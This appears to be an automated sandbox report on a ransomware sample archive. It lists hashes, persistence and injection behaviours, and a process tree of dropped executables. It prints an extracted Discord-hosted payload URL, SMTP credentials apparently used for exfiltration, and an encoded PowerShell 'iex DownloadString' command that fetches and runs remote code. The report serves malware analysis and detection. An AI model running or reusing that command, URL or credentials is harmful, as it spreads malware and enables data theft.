Analysis
-
max time kernel
191s -
max time network
189s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
10-09-2024 17:52
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00486.7z
Resource
win10v2004-20240802-en
General
-
Target
RNSM00486.7z
-
Size
117.8MB
-
MD5
9cad20cac5e7a2828d978175bb888a8d
-
SHA1
d7253644d5b0c999adef488892b0b34115576d53
-
SHA256
4b4567580aa77913f8b2845b322a1fa43010c5210f791fbbe780ec75934a4f23
-
SHA512
271023ad2f017c2a89e81ebe67725ad3ef5e4114bd0249505fa1fff6ca102a314b93ef3ac7463f816b187b1cc11f521465138dbfcff8a08d32e1ce3ac0855b87
-
SSDEEP
3145728:4AORmmLuCgOX0cXsvmpqt8t2ed+Uv81oz+tHTQY:lmym0HvmZdZZszQY
Malware Config
Extracted
https://cdn.discordapp.com/attachments/880265796767608892/881902176195186728/New_Text_Document.txt
Extracted
Protocol: smtp- Host:
smtp.yandex.com.tr - Port:
587 - Username:
[email protected] - Password:
010203040506
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 66 3092 powershell.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation smss.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe -
Executes dropped EXE 18 IoCs
pid Process 1996 HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe 1844 HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe 4384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe 1896 HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe 4812 HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe 1740 HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe 2464 zbhnd.exe 768 HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe 1192 Setup.exe 2480 Google123.exe 3540 smss.exe 4776 HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe 4832 Setup.tmp 5056 7D57AD13E21.exe 4480 BD366504095.exe 5092 Scegli_nome_allegato.exe 4828 7D57AD13E21.exe 2492 BD366504095.exe -
Loads dropped DLL 5 IoCs
pid Process 4832 Setup.tmp 4832 Setup.tmp 4832 Setup.tmp 4832 Setup.tmp 4832 Setup.tmp -
resource yara_rule behavioral1/files/0x00080000000234b8-22.dat upx behavioral1/files/0x0007000000023592-458.dat upx -
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google123 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RNSM00486\\00486\\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe\"" HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hacker Man = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\svchost.exe" HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google123 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Google123.exe\"" Google123.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\7D57AD13E21.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\7D57AD13E21.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\BD366504095.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\Admin\\AppData\\Roaming\\smss.exe\"" smss.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 59 checkip.dyndns.org -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5056 set thread context of 4828 5056 7D57AD13E21.exe 152 PID 4480 set thread context of 2492 4480 BD366504095.exe 153 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 4440 1996 WerFault.exe 105 556 1996 WerFault.exe 105 -
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Scegli_nome_allegato.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7D57AD13E21.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zbhnd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BD366504095.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BD366504095.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7D57AD13E21.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch Scegli_nome_allegato.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Scegli_nome_allegato.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\IESettingSync Scegli_nome_allegato.exe Set value (int) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Scegli_nome_allegato.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 1540 reg.exe 844 reg.exe 3700 reg.exe -
Suspicious behavior: EnumeratesProcesses 42 IoCs
pid Process 4372 powershell.exe 4372 powershell.exe 728 powershell.exe 728 powershell.exe 1792 powershell.exe 1792 powershell.exe 4560 powershell.exe 4560 powershell.exe 4312 powershell.exe 4312 powershell.exe 4804 powershell.exe 4804 powershell.exe 2112 powershell.exe 2112 powershell.exe 3812 powershell.exe 3812 powershell.exe 2212 powershell.exe 2212 powershell.exe 4804 powershell.exe 2212 powershell.exe 2112 powershell.exe 1792 powershell.exe 728 powershell.exe 4560 powershell.exe 4312 powershell.exe 3812 powershell.exe 2480 Google123.exe 2480 Google123.exe 2480 Google123.exe 2480 Google123.exe 2480 Google123.exe 2480 Google123.exe 3092 powershell.exe 3092 powershell.exe 3092 powershell.exe 2480 Google123.exe 2480 Google123.exe 2480 Google123.exe 2480 Google123.exe 2480 Google123.exe 2480 Google123.exe 2480 Google123.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 3984 7zG.exe Token: 35 3984 7zG.exe Token: SeSecurityPrivilege 3984 7zG.exe Token: SeSecurityPrivilege 3984 7zG.exe Token: SeDebugPrivilege 4372 powershell.exe Token: SeDebugPrivilege 4384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe Token: SeDebugPrivilege 2480 Google123.exe Token: SeDebugPrivilege 728 powershell.exe Token: SeDebugPrivilege 1792 powershell.exe Token: SeDebugPrivilege 4804 powershell.exe Token: SeDebugPrivilege 4560 powershell.exe Token: SeDebugPrivilege 4312 powershell.exe Token: SeDebugPrivilege 2212 powershell.exe Token: SeDebugPrivilege 2112 powershell.exe Token: SeDebugPrivilege 3812 powershell.exe Token: SeIncreaseQuotaPrivilege 2212 powershell.exe Token: SeSecurityPrivilege 2212 powershell.exe Token: SeTakeOwnershipPrivilege 2212 powershell.exe Token: SeLoadDriverPrivilege 2212 powershell.exe Token: SeSystemProfilePrivilege 2212 powershell.exe Token: SeSystemtimePrivilege 2212 powershell.exe Token: SeProfSingleProcessPrivilege 2212 powershell.exe Token: SeIncBasePriorityPrivilege 2212 powershell.exe Token: SeCreatePagefilePrivilege 2212 powershell.exe Token: SeBackupPrivilege 2212 powershell.exe Token: SeRestorePrivilege 2212 powershell.exe Token: SeShutdownPrivilege 2212 powershell.exe Token: SeDebugPrivilege 2212 powershell.exe Token: SeSystemEnvironmentPrivilege 2212 powershell.exe Token: SeRemoteShutdownPrivilege 2212 powershell.exe Token: SeUndockPrivilege 2212 powershell.exe Token: SeManageVolumePrivilege 2212 powershell.exe Token: 33 2212 powershell.exe Token: 34 2212 powershell.exe Token: 35 2212 powershell.exe Token: 36 2212 powershell.exe Token: SeIncreaseQuotaPrivilege 4804 powershell.exe Token: SeSecurityPrivilege 4804 powershell.exe Token: SeTakeOwnershipPrivilege 4804 powershell.exe Token: SeLoadDriverPrivilege 4804 powershell.exe Token: SeSystemProfilePrivilege 4804 powershell.exe Token: SeSystemtimePrivilege 4804 powershell.exe Token: SeProfSingleProcessPrivilege 4804 powershell.exe Token: SeIncBasePriorityPrivilege 4804 powershell.exe Token: SeCreatePagefilePrivilege 4804 powershell.exe Token: SeBackupPrivilege 4804 powershell.exe Token: SeRestorePrivilege 4804 powershell.exe Token: SeShutdownPrivilege 4804 powershell.exe Token: SeDebugPrivilege 4804 powershell.exe Token: SeSystemEnvironmentPrivilege 4804 powershell.exe Token: SeRemoteShutdownPrivilege 4804 powershell.exe Token: SeUndockPrivilege 4804 powershell.exe Token: SeManageVolumePrivilege 4804 powershell.exe Token: 33 4804 powershell.exe Token: 34 4804 powershell.exe Token: 35 4804 powershell.exe Token: 36 4804 powershell.exe Token: SeIncreaseQuotaPrivilege 2112 powershell.exe Token: SeSecurityPrivilege 2112 powershell.exe Token: SeTakeOwnershipPrivilege 2112 powershell.exe Token: SeLoadDriverPrivilege 2112 powershell.exe Token: SeSystemProfilePrivilege 2112 powershell.exe Token: SeSystemtimePrivilege 2112 powershell.exe Token: SeProfSingleProcessPrivilege 2112 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3984 7zG.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 3672 OpenWith.exe 3020 cmd.exe 2480 Google123.exe 5092 Scegli_nome_allegato.exe 5092 Scegli_nome_allegato.exe 5092 Scegli_nome_allegato.exe 4828 7D57AD13E21.exe 2492 BD366504095.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4372 wrote to memory of 3020 4372 powershell.exe 97 PID 4372 wrote to memory of 3020 4372 powershell.exe 97 PID 3020 wrote to memory of 1996 3020 cmd.exe 105 PID 3020 wrote to memory of 1996 3020 cmd.exe 105 PID 3020 wrote to memory of 1996 3020 cmd.exe 105 PID 3020 wrote to memory of 1844 3020 cmd.exe 106 PID 3020 wrote to memory of 1844 3020 cmd.exe 106 PID 3020 wrote to memory of 1844 3020 cmd.exe 106 PID 3020 wrote to memory of 4384 3020 cmd.exe 107 PID 3020 wrote to memory of 4384 3020 cmd.exe 107 PID 3020 wrote to memory of 1896 3020 cmd.exe 109 PID 3020 wrote to memory of 1896 3020 cmd.exe 109 PID 3020 wrote to memory of 1896 3020 cmd.exe 109 PID 3020 wrote to memory of 4812 3020 cmd.exe 110 PID 3020 wrote to memory of 4812 3020 cmd.exe 110 PID 3020 wrote to memory of 4812 3020 cmd.exe 110 PID 3020 wrote to memory of 1740 3020 cmd.exe 112 PID 3020 wrote to memory of 1740 3020 cmd.exe 112 PID 3020 wrote to memory of 1740 3020 cmd.exe 112 PID 1844 wrote to memory of 5092 1844 HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe 114 PID 1844 wrote to memory of 5092 1844 HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe 114 PID 1844 wrote to memory of 5092 1844 HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe 114 PID 4812 wrote to memory of 2464 4812 HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe 115 PID 4812 wrote to memory of 2464 4812 HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe 115 PID 4812 wrote to memory of 2464 4812 HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe 115 PID 3020 wrote to memory of 768 3020 cmd.exe 116 PID 3020 wrote to memory of 768 3020 cmd.exe 116 PID 3020 wrote to memory of 768 3020 cmd.exe 116 PID 5092 wrote to memory of 1192 5092 WScript.exe 118 PID 5092 wrote to memory of 1192 5092 WScript.exe 118 PID 5092 wrote to memory of 1192 5092 WScript.exe 118 PID 3020 wrote to memory of 4776 3020 cmd.exe 119 PID 3020 wrote to memory of 4776 3020 cmd.exe 119 PID 3020 wrote to memory of 4776 3020 cmd.exe 119 PID 4384 wrote to memory of 2480 4384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe 120 PID 4384 wrote to memory of 2480 4384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe 120 PID 5092 wrote to memory of 3540 5092 WScript.exe 121 PID 5092 wrote to memory of 3540 5092 WScript.exe 121 PID 1192 wrote to memory of 4832 1192 Setup.exe 123 PID 1192 wrote to memory of 4832 1192 Setup.exe 123 PID 1192 wrote to memory of 4832 1192 Setup.exe 123 PID 3540 wrote to memory of 2212 3540 smss.exe 124 PID 3540 wrote to memory of 2212 3540 smss.exe 124 PID 3540 wrote to memory of 1792 3540 smss.exe 126 PID 3540 wrote to memory of 1792 3540 smss.exe 126 PID 3540 wrote to memory of 728 3540 smss.exe 127 PID 3540 wrote to memory of 728 3540 smss.exe 127 PID 3540 wrote to memory of 4804 3540 smss.exe 128 PID 3540 wrote to memory of 4804 3540 smss.exe 128 PID 3540 wrote to memory of 3812 3540 smss.exe 132 PID 3540 wrote to memory of 3812 3540 smss.exe 132 PID 3540 wrote to memory of 4560 3540 smss.exe 134 PID 3540 wrote to memory of 4560 3540 smss.exe 134 PID 3540 wrote to memory of 4312 3540 smss.exe 136 PID 3540 wrote to memory of 4312 3540 smss.exe 136 PID 3540 wrote to memory of 2112 3540 smss.exe 138 PID 3540 wrote to memory of 2112 3540 smss.exe 138 PID 1740 wrote to memory of 1540 1740 HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe 141 PID 1740 wrote to memory of 1540 1740 HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe 141 PID 1740 wrote to memory of 1540 1740 HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe 141 PID 768 wrote to memory of 844 768 HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe 143 PID 768 wrote to memory of 844 768 HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe 143 PID 768 wrote to memory of 844 768 HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe 143 PID 1740 wrote to memory of 5056 1740 HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe 145
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00486.7z1⤵
- Modifies registry class
PID:4724
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3672
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3564
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\RNSM00486\" -spe -an -ai#7zMap5264:96:7zEvent212661⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3984
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exeHEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1996 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 2724⤵
- Program crash
PID:4440
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 2764⤵
- Program crash
PID:556
-
-
-
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\djfgkjdnbkjdfhooerkhjfjdlfkgdf.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp" /SL5="$4023A,3291817,140800,C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4832
-
-
-
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe"C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMQA5ADAAMgAxADcANgAxADkANQAxADgANgA3ADIAOAAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA=6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3092
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Users\Admin\AppData\Roaming\Google123.exe"C:\Users\Admin\AppData\Roaming\Google123.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2480
-
-
-
